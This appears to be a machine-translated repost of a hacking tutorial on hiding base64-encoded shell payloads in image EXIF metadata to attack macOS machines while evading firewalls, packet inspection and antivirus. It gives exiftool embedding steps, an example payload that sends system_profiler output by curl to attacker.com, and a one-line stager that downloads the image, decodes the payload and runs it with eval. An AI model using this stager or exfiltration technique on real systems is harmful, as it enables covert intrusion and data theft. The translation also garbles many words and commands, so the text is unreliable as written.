قالب وردپرس درنا توس
Home / Tips and Tricks / How to hide payload within photometadata «Zero byte :: WonderHowTo

How to hide payload within photometadata «Zero byte :: WonderHowTo

Complex shell scripts can be implanted in photo-metadata and later used to exploit a MacBook. In addition to obfuscating the true nature of an attack, this technique can be used to avoid network firewalls and vigilant sysadmin.

In this attack scenario, a malicious command will be embedded directly in EXIF ​​metadata for an image file. The striker would host the malicious image on a public site like Flickr, making it available to anyone to download. A stager will then be created to download the image, extract the metadata and execute the embedded command.

To be clear, do not double-click the image file to execute the embedded command. It's another type of macOS attack, something we've dealt with in another article. Instead, the command will be hidden in the metadata of the image and used as a payload system. Stager and payload are two different aspects of the attack. The stager is designed to download the image and execute the embedded payload, while the payload is the last bit of code (embedded in the image) to execute one or more commands.

Why embed payloads in photos?

So, why has a stager at all about the attacker already capable of executing code on the target MacBook? Well, mainly, varying degrees of active tax evasion. Stagers can also be quite small, just ~ 1

00 characters long, making them faster to execute with a USB Rubber Ducky or MouseJack attack, for example.

In most scenarios, it is not possible to hide a payload in an image file. In very secure environments, but where each domain is logged by firewall software, it may be beneficial to hide the payload content and origin.

first Firewall Evasion

With software such as pfSense, each domain and IP address that each device on the network visits is logged. With commercial software such as Fortinet's FortiGate firewall, each package can be thoroughly dissected for analysis. These types of firewalls make it difficult for an attacker to use simple TCP connections established with Netcat to continue on the compromised device or to push the network card.

The use of images to hide payloads can make it difficult for sysadmins to monitor traffic to identify activity as malicious or suspicious.

2nd Deep Packet Inspection Evasion

In secured environments, operating systems can be configured to use proprietary certificates, allowing network administrators to decrypt data to and from devices on the network. With tools like Wireshark, it is possible to compile TCP streams and recover image files using the unused data.

3rd Antivirus Evasion

Premium versions of Avast and AVG antivirus software can analyze and detect certain types of stager and payload. For example, the AV software can identify most stays created by Empire. With hardened network environments, it may require a high degree of confusion to avoid detection signatures. Used stagers can make it difficult for AV software to detect the true nature of a particular file.

Tools to be familiar with

Before moving forward you should have a general comfort with tools like curl system_profiles exiftool grip and Bash scripts before continuing. All these substances have been covered at Null Byte before sometime in any way.

Step 1: Download an image

To get started download the image to be used in the attack. The stager (shown in a later step) does not actually save the image to the target computer, so it does not have to be a picture of something particularly relevant. For demonstration purposes, we can use my Twitter profile picture which can be downloaded with wget and saved ( -O ) to the / tmp directory.

 ] wget & https: //pbs.twimg.com/profile_images/944123132478189568/tgQESxWF_400x400.jpg' -O image.jpg 
  - 2019-05-15 06: 50: 22-- https: //pbs.twimg .com / profile_images / 944123132478189568 / tgQESxWF_400x400.jpg
Solution pbs.twimg.com (pbs.twimg.com) ..., 2606: 2800: 220: 1410: 489: 141e: 20bb: 12f6
Connection to pbs.twimg.com (pbs.twimg.com) | 72,21,91,70 |: 443 ... connected.
HTTP request sent, waiting for reply ... 200 OK
Length: 19316 (19K) [image/jpeg]
Save to: & # 39; image.jpg & # 39;

image.jpg 100% [=================================>] 18.86K 64.4KB / s in 0.3s

2019-05-02 06:50:25 (64.4 KB / s) - image.jpg & # 39; saved [19316/19316]

Step 2: Generate payload

For this example, we first learn to execute a simple point on the command. When the trainee runs the payload embedded in the image, it will create a blank file on the MacOS desktop "hacked".

First use printf base64 and tr to encode the payload. Base64 will encode the string, while tr will erase ( -d ) newlines () ). You should always attach the payload ( touch ~ / Desktop / hacked ) to simple quotes.

  printf & # 39; touch ~ / Desktop / hacked & # 39; | base64 | tr-d & # 39; 
  dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA == 

A more complex payload involving the macOS system_profiles command can be used to perform situational awareness attacks as well as curl to exfil the command to the attacker's server.

  printf & d; d = $ (system_profiler SPFirewallDataType); curl -s - data "$ d" -X POST http://attacker.com/index.php' | base64 | tr -d & # 39; 
  ZD0kKHN5c3RlbV9wcm9maWxlciBTUEZpcmV3YWxsRGF0YVR5cGUpO2N1cmwgLXMgLS1kYXRhICIkZCIgLVggUE9TVCBodHRwOi8vYXR0YWNrZXIuY29tL2luZGV4LnBocA == [19659027] To take it a step further, it would be possible to encode an entire Bash script that has been compressed into one line. In my tests, there was no limit to the number of characters that can be embedded in a metadata group. 

  cat /path/to/any_script.sh | base64 | Wood 3: Embed the payload in the image 

To insert the encoded payload into the image, install exifool .


  apt-get update && apt-get install exiftool -V 
  Read the package listings ... Ready
Building dependency tree
Reads state information ... Ready
Note, select "libimage-exiftool-perl" instead of "exifool"
The following additional packages will be installed:
libarchive-zip-perl (1.64-1)
libmime-charset-perl (1.012.2-1)
libposix-strptime-perl (0.13-1 + b5)
libsombok3 (2.4.0-2)
libunicode-linebreak-perl (0.0.20190101-1)
Suggested packages:
liben code male extract (0.23-5 + bl)
libpod2 base perl (0.043-2)
The following new packages will be installed:
libarchive-zip-perl (1.64-1)
libimage-exifool-perl (11.16-1)
libmime-charset-perl (1.012.2-1)
libposix-strptime-perl (0.13-1 + b5)
libsombok3 (2.4.0-2)
libunicode-linebreak-perl (0.0.20190101-1)
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
The need to get 3,629 kbyte archives.
After this operation, 21.0 MB of additional disk space will be used.
Do you want to continue? [Y/n] 

Delete all EXIF ​​metadata that may be in the image.

  exiftool -all = image.jpg 
  1 image file updated 

Then use exiftool ] to add a metadata generator - it will work with any idle tag containing it encoded payload. Certificate tag is used in this demonstration.

  exiftool -Certificate = & # 39; dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA == & # 39; image.jpg 
  1 image files updated 

Once it is ready, verify the certificate tag correctly added by the following command exiftool . Notice the coded string on line 13.

  exiftool image.jpg 
  01 ExifTool Version number: 11.16
02 Filename: image.jpg
03 directory :.
04 File size: 21 KB
05 File change date / time: 2019: 05: 02 06: 50: 57 + 00: 00
06 File access Date / Time: 2019: 05: 02 06: 50: 57 + 00: 00
07 File Inode Change Date / Time: 2019: 05: 02 06: 50: 57 + 00: 00
08 File permissions: rw-r - r--
09 File type: JPEG
10 file extension: jpg
11 MIME type: image / jpeg
12 XMP Toolkit: Image :: ExifTool 11.16
13 certificates: dG91Y2ggfi9EZXNrdG9wL2hhY2tlZA ==
14 image width: 400
Image height: 400
16 coding process: Progressive DCT, Huffman coding
17 bits per sample: 8
18 color components: 3
19 Y Cb Cr Sub-sampling: YCbCr4: 2: 0 (2 2)
20 Image size: 400x400
21 Megapixels: 0.160 

Step 4: Upload the image to a website

Finding a suitable website is tricky. The criteria for this are several times.

Avoid EXIF ​​Data Sanitization

Many popular sites like Twitter, Imgur and Instagram automatically dry metadata from images when uploaded. It is mainly done to protect users from accidentally uploading images containing GPS coordinates that allow cyberstalkers and cyberbullies to harass and locate these users.

Images containing payloads would be dried when uploaded to regular sites. The candidate website must be tested manually by first uploading the image, then downloading it and using the exiftool to see if the embedded payload is still intact.

Web Encryption

Transport layer security is important for further obfuscating this attack. The site used to host the image will use HTTPS, which will help prevent sysadmin from analyzing the GET request with surgical precision.

Web Traffic Malfunctions

Ideally, the site used in the attack would be a frequent visitor of the target. For example, if the target visited a particular news site each morning, a visit to this domain would not be suspected of sysadmins monitoring the traffic on the network. On the other hand, an unusual GET request on a foreign website or adult site will probably increase some red flags. This type of information can be counted during the reconnaissance phase with secret packet catches. The key is to make the traffic as normal as possible for the goal's web behavior.

Step 5: Generate Stager

In my quick attempts to extract metadata from images with built-in MacOS tools, nobody seemed to access or display the particular string ("Certificate") of EXIF ​​metadata that is embedded in the image. Fortunately, has a -a alternative that allows to process binary files (i.e., images) as if they were interest text, so that they could find the "Certificate" string in metadata .

Below is an example stager that can be used to download images, extract and decode payloads, and then run the command (s).

  p = $ (curl -s https://website.com/image .jpg | grep Cert -a | sed & # 39; s / <[^>]> // g & # 39; | base64 -D) ; eval $ p 

There are some things going on here, so I break down every section of the support.

  • p = $ (...) - Most of the struts are enclosed in a variable called "p" (aka payload ) saved directly on the target's macOS hard disk.
  • curl's homepage.com/image.jpg - Curl is used here to silently (-s) download the image containing the payload from a site chosen by the attacker. The image immediately piped (|) to the following grep command.
  • grab Cert -a - Grab takes the rada image data, processes it as a regular text (-a) while searching for the "Cert" string. This output would be displayed in a terminal as below.
  • sed & # 39; s / <[^>] * // // & # 39; - The above output is immediately piped into this custom command. Sed removes all surrounding XML data (ie ), leaving only the encoded string.
  • base64 -D - The encoded string is piped into this bas64 command where it is decoded with the -D option, which ultimately makes the $ p variable the decoded payload.
  • eval $ p - Finally, eval is used to evaluate the variable as a command, and effectively execute the payload in its variable form.

We can verify the attack that was successfully performed by finding the hacked file on the MacOS desktop.

Again, this is a very simple payload. More sophisticated attacks can involve automated browser dumping, microphone interception, enlightening awareness, privilege scaling, sudo password filtering, etc.

It is all there is to hide the payload within image metadata. Stay tuned, so I will show you how to exfoliate data inside images - without using metadata tags - in a future article! Notify me on Twitter @tokyoneon_ if you have any questions or leave a comment below.

Don't miss: Connect to a back door MacBook from anywhere in the world

Cover photo and screenshots of tokyoneon / Zero byte

Source link